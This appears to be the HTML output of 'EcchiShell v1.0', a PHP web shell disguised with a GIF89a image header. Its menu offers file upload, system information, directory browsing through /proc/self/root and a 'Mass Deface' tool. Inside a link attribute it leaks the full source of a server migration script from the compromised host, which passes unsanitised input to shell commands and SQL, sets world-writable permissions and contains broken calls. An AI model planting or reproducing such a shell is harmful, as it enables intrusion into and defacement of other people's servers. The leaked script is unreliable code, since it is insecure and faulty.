GIF89a;
   <!DOCTYPE html>
   <html lang="en">

   <head>
      <meta charset="UTF-8">
      <meta http-equiv="X-UA-Compatible" content="IE=edge">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      <meta name="keywords" content="./EcchiExploit">
      <meta name="author" content="./EcchiExploit">
      <meta name="description" content="Priv Shell">
      <meta name="robots" content="noindex, nofollow">
      <link rel="icon" href="https://1.bp.blogspot.com/-Q4FzNb_oemU/XZ_a4WzmgNI/AAAAAAAAAZg/udnrGlkAkV0NYh-rDTC-VB64rimuu5VtQCK4BGAYYCw/s1600/IMG-20190901-WA0263.jpg" type="image/png">
      <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.15.3/css/all.css" />
      <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.6.0/dist/css/bootstrap.min.css" integrity="sha384-B0vP5xmATw1+K9KRQjQERJvTumQW0nPEzvF6L/Z6nronJ3oUOFUFpCjEUQouq2+l" crossorigin="anonymous">
      <title>EcchiShell v1.0</title>
      <script src="https://code.jquery.com/jquery-3.5.1.slim.min.js" integrity="sha384-DfXdz2htPH0lsSSs5nCTpuj/zy4C+OGpamoFVy38MVBnE+IbbVYUew+OrCXaRkfj" crossorigin="anonymous"></script>
   </head>

   <style type="text/css">
      #btn-back-to-top {
         position: fixed;
         bottom: 20px;
         right: 20px;
         display: none;
      }
   </style>

   <body class="bg-info">
      <nav class="navbar navbar-expand-md bg-dark navbar-dark">
         <a class="navbar-brand" href="/Products/Large/lar.pHP">
            <img src="https://1.bp.blogspot.com/-Q4FzNb_oemU/XZ_a4WzmgNI/AAAAAAAAAZg/udnrGlkAkV0NYh-rDTC-VB64rimuu5VtQCK4BGAYYCw/s1600/IMG-20190901-WA0263.jpg" alt="logo" style="width: 150px">
         </a>
         <button class="navbar-toggler" data-toggle="collapse" data-target="#collapsibleNavbar" aria-controls="collapsibleNavbar" aria-expanded="false" aria-label="Toggle navigation">
            <span class="navbar-toggler-icon"></span>
         </button>

         <div class="collapse navbar-collapse" id="collapsibleNavbar">
            <ul class="navbar-nav">
               <li class="nav-item">
                  <button class="btn btn-outline-secondary border-0">
                     <a class="nav-link" href="?dir=//proc/self/root/scripts&opt=upload">Upload File</a>
                  </button>
               </li>
               <li class="nav-item">
                  <button class="btn btn-outline-secondary border-0">
                     <a class="nav-link" data-toggle="collapse" href="#info" role="button" data-target="#info" aria-expanded="false" aria-controls="info">System Info</a>
                  </button>
               </li>
               <li class="nav-item">
                  <button class="btn btn-outline-secondary border-0">
                     <a class="nav-link" data-toggle="collapse" href="#tool" role="button" data-target="#tool" aria-expanded="false" aria-controls="tool">Tool</a>
                  </button>
               </li>
            </ul>
         </div>
      </nav>
      <div class="container">
         <div class="row justify-content-center mt-5">
            <div class="md-4">
               <label for="dir" class="font-weight-bold text-dark">You In Here :</label>
               <a class='font-weight-bold text-warning' id='dir' href='?dir='></a>/<a class='font-weight-bold text-warning' id='dir' href='?dir=/'></a>/<a class='font-weight-bold text-warning' id='dir' href='?dir=//proc'>proc</a>/<a class='font-weight-bold text-warning' id='dir' href='?dir=//proc/self'>self</a>/<a class='font-weight-bold text-warning' id='dir' href='?dir=//proc/self/root'>root</a>/<a class='font-weight-bold text-warning' id='dir' href='?dir=//proc/self/root/scripts'>scripts</a>/               <div class="collapse multi-collapse p-3" id="tool">
                  <div class="card card-body bg-dark text-center">
                     <p>
                        <a class="btn btn-outline-info text-white" href="?dir=//proc/self/root/scripts&opt=mass">
                           <i class="fad fa-clone"></i>
                           Mass Deface
                        </a>
                        <a class="btn btn-outline-info text-white" href="<?php

ini_set('disable_functions', 'exec');
$backup_file = $argv[1];
echo $backup_file;
if(stripos($backup_file,".tar.gz") === FALSE){
	echo "backup_file $backup_file is not proper Backup file";exit;		
}

$buffer = "Migration started";
GetmigrationLog($buffer);

function GetmigrationLog($buffer, $tmp = "/root/migration.log"){

	$buffer = "\n $buffer \n";
	$handle = fopen($tmpfname, "w");
	fwrite($handle, $buffer);
	fclose($handle);
	
}
function GetAbsolutePath($param){

	$param_path=shell_exec("whereis $param | awk '{ print $2}'");
	$param_path=str_replace("\n", $param_path);
	$param_path=str_replace('\n', $param_path);

	return $param_path;
}

function GenrateRandomPassword($length){

        $code = '';
        $l="abcdefghijklmnopqrstuvwxyz";
        $u="ABCDEFGHIJKLMNOPQRSTUVWXYZ";
        $s='!@#$&*_';
        $n="0123456789";
        $z ='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ@#$_0123456789';
        $i = 0;
        $p =  1;
        $j = 0;
        $p2 = $length-4;
        $l1 = $u1 = $s1 = $n1 = $m ="";
        while ($i < $p){
		$l1= substr($l, mt_rand(0, strlen($l)-1), 1);
		$u1= substr($u, mt_rand(0, strlen($u)-1), 1);
		$s1= substr($s, mt_rand(0, strlen($s)-1), 1);
		$n1= substr($n, mt_rand(0, strlen($n)-1), 1);
		$i++;
        }
       while ($j < $p2){
	       	$m .= substr($z, mt_rand(0, strlen($z)-1), 1);
		$j++;
       }
       $int_ga = $l1.$u1.$s1.$n1.$m; 
       $code = str_shuffle($int_ga);
       return $code;
}

//$cwd=__DIR__;
$cwd = getcwd();
$backup_file_nam = trim($backup_file,".tar.gz");

GetmigrationLog("backup_file_nam $backup_file_nam");
$backup_user_dir = "$backup_file_nam/cp";	
shell_exec("$tar_path -xvf $backup_file $backup_user_dir -C /tmp --strip-components=1");
$backup_userdata_dir = "/tmp/$backup_user_dir";

$backup_maindom_dir = "$backup_file_nam/userdata/main";
shell_exec("$tar_path -xvf $backup_file $backup_maindom_dir -C /tmp --strip-components=1");
$backup_maindomain_file = "/tmp/$backup_maindom_dir";

$backup_user_dir_arr = scandir($backup_user_dir);
$user_file = $backup_user_dir_arr[0];
$userdata_file = "$backup_user_dir/$user_file";
GetmigrationLog("userdata_file $userdata_file backup_maindomain_file $backup_maindomain_file");
if(!file_exists($userdata_file) || !file_exists($backup_maindomain_file)){
	echo "userdata_file or backup_maindomain_file backup user data file is missing";exit;
}
$username = trim(shell_exec(GetAbsolutePath('cat')." $userdata_file | ".GetAbsolutePath('grep')." \"^USER=\" | ".GetAbsolutePath('awk')." -F\"=\" '{ print $2 }'"));
$email_id = trim(shell_exec(GetAbsolutePath('cat')." $userdata_file | ".GetAbsolutePath('grep')." \"^CONTACTEMAIL=\" | ".GetAbsolutePath('awk')." -F\"=\" '{ print $2 }'"));
$domain = trim(shell_exec(GetAbsolutePath('cat')." $backup_maindomain_file | ".GetAbsolutePath('grep')." \"^main_domain:\" | ".GetAbsolutePath('awk')." -F\"=\" '{ print $2 }'"));
if(empty($email_id)){
	$email_id = "admin@$domain";
}
GetmigrationLog("username ==> $username email_id ==> $email_id domain $domain is missing value");

if(empty($username) || empty($email_id) || empty($domain)){
	echo "username ==> $username email_id ==> $email_id domain $domain is missing value";exit;	
}

$OvipanelAPI = new OvipanelAPI();

$resellerid = 1;
$packageid = 1;
$groupid = 3;
$password = GenrateRandomPassword(9);

$input = array(
    'resellerid' => $resellerid,
    'username' => $username,
    'packageid' => $packageid,
    'groupid' => $groupid,
    'fullname' => $username,
    'email' => $email_id,
    'address' => '',
    'postcode' => '',
    'phone' => '',
    'password' => $password,
    'sendemail' => '',
    'emailsubject' => '',
    'domain' => $domain
);

GetmigrationLog("input $input");
$server_ip = $OvipanelAPI->GetXsettingalue('server_ip');
$port = 2086;
$module = "whmcs";
$request = "CreateClientForWhmMigration";
$apikey = $OvipanelAPI->GetXsettingalue('apikey');
$authuser = "";
$authpass = "";
$hosted_dir = $OvipanelAPI->GetXsettingalue('hosted_dir');	
$response = $OvipanelAPI->OvipanelAPIResquest($server_ip, $port, $module, $input, $apikey, $request, $authuser, $authpass);
$user_dir = $hosted_dir."/".$username;

GetmigrationLog("response $response");

if(!is_dir("$user_dir")){
	GetmigrationLog("$username, user account is not created");
	echo "$username, user account is not created \n";
}
$user_backup_dir=$hosted_dir."/".$username."/backups";

if(!is_dir($user_backup_dir)){
	shell_exec("mkdir -p $user_backup_dir");
}
shell_exec("chmod 777 $user_backup_dir");
shell_exec("chown $username:$username $user_backup_dir");
shell_exec("mv $cwd/$backup_file $user_backup_dir");

GetmigrationLog(GetAbsolutePath('php')." /scripts/restoreclient.php $backup_file $username >> /root/migration.log");
	
shell_exec(GetAbsolutePath('php')." /scripts/restoreclient.php $backup_file $username >> /root/migration.log");


class OvipanelAPI
{
	private $version;
    	private $encoding;

    	public function __construct($xmlVersion = '1.0', $xmlEncoding = 'UTF-8'){

        	$this->version = $xmlVersion;
        	$this->encoding = $xmlEncoding;
		require('/etc/sentora/panel/cnf/database.php');

		try {
			$dsn = "mysql:dbname=$dbname;$ovi_socket_path";
			$this->zdbh = new PDO($dsn, $user, $pass, array(PDO::MYSQL_ATTR_INIT_COMMAND => "SET NAMES 'utf8'"));

		} catch (PDOException $e) {
			echo "Connection failed: " . $e->getMessage();
			exit();
		}
    	}

	public function GetXsettingalue($params){

		$sql = "SELECT so_value_tx FROM x_settings WHERE so_name_vc = $params";
		$numrows = $this->zdbh->prepare($sql);
		$numrows->execute();
		if($numrows->rowCount() == 0){
			return false;
		}
		$result = $numrows->fetch();
		return $result['so_value_tx'];
	}
	
	public function ValueEmptyCheck($value, $params){
	
		if(empty($value)){
		echo "$params argument is empty";exit;
		}
	
		return $value;
	}
 	
    	public function OvipanelAPIResquest($server_ip, $port, $module, $input, $apikey, $request, $authuser, $authpass){
	
		$server_ip = $this->ValueEmptyCheck($server_ip, 'server_ip');
		//$input = $this->ValueEmptyCheck($input, 'input');
		$port = $this->ValueEmptyCheck($port, 'port');
		$module = $this->ValueEmptyCheck($module, 'module');
		$request = $this->ValueEmptyCheck($request, 'request');
		$apikey = $this->ValueEmptyCheck($request, 'apikey');
	//	$authuser = $this->ValueEmptyCheck($authuser, 'authuser');
	//	$authpass = $this->ValueEmptyCheck($authpass, 'authpass');

		return $this->CurlRequestOviPanelAPI($server_ip, $port, $module, $input, $apikey, $request, $authuser, $authpass);
    	}

    	public function CurlRequestOviPanelAPI($server_ip, $port, $module, $input_tag, $apikey, $request, $authuser, $authpass){

		$input_xml = $this->ConvertArraytoXMLdata($input_tag, $apikey, $request, $authuser, $authpass);	
		$url="http://$server_ip:$port/bin/oviapi.php?module=$module";
		$ch = curl_init();
		curl_setopt($ch, CURLOPT_URL, $url);
		curl_setopt($ch, CURLOPT_POSTFIELDS, "xmlRequest=" . $input_xml);
		curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
		curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 300);
		curl_setopt($ch, CURLOPT_TIMEOUT, 200);
		curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
		curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
		$data = curl_exec($ch);
		if($data === false){
    		echo 'Curl error: ' . curl_error($ch);
		}
		curl_close($ch);
		return $data;
    	}	

    	public function ConvertArraytoXMLdata($input_tag, $apikey, $request, $authuser, $authpass){

		$input = array( "apikey" => $apikey,
                		"request" => $request,
                		"authuser" => $authuser,
                		"authpass" => $authpass,
                		"content" => $input_tag
        		);
		$input_xml = $this->buildXML($input);
		return $input_xml;
    	}

    public function buildXML($data, $startElement = 'xmws')
    {
        if (!is_array($data)) {
            $err = 'Invalid variable type supplied, expected array not found on line ' . __LINE__ . ' in Class: ' . __CLASS__ . ' Method: ' . __METHOD__;
            trigger_error($err);
            return false; 
        }
        $xml = new XmlWriter();
        $xml->openMemory();
        $xml->startDocument($this->version, $this->encoding);
        $xml->startElement($startElement);

        $data = $this->writeAttr($xml, $data);
        $this->writeEl($xml, $data);

        $xml->endElement(); 
        return $xml->outputMemory(true);
    }

    protected function writeAttr(XMLWriter $xml, $data)
    {
        if (is_array($data)) {
            $nonAttributes = array();
            foreach ($data as $key => $val) {
                if ($key[0] == '@') {
                    $xml->writeAttribute(substr($key, 1), $val);
                } else if ($key[0] == '%') {
                    if (is_array($val)) $nonAttributes = $val;
                    else $xml->text($val);
                } elseif ($key[0] == '#') {
                    if (is_array($val)) $nonAttributes = $val;
                    else {
                        $xml->startElement(substr($key, 1));
                        $xml->writeCData($val);
                        $xml->endElement();
                    }
                }else if($key[0] == "!"){
                    if (is_array($val)) $nonAttributes = $val;
                    else $xml->writeCData($val);
                } 
                else $nonAttributes[$key] = $val;
            }
            return $nonAttributes;
        } else return $data;
    }
    protected function writeEl(XMLWriter $xml, $data)
    {
        foreach ($data as $key => $value) {
            if (is_array($value) && !$this->isAssoc($value)) { 
                foreach ($value as $itemValue) {
                    if (is_array($itemValue)) {
                        $xml->startElement($key);
                        $itemValue = $this->writeAttr($xml, $itemValue);
                        $this->writeEl($xml, $itemValue);
                        $xml->endElement();
                    } else {
                        $itemValue = $this->writeAttr($xml, $itemValue);
                        $xml->writeElement($key, "$itemValue");
                    }
                }
            } else if (is_array($value)) { 
                $xml->startElement($key);
                $value = $this->writeAttr($xml, $value);
                $this->writeEl($xml, $value);
                $xml->endElement();
            } else { 
                $value = $this->writeAttr($xml, $value);
                $xml->writeElement($key, "$value");
            }
        }
    }

    protected function isAssoc($array)
    {
        return (bool)count(array_filter(array_keys($array), 'is_string'));
    }
}

?>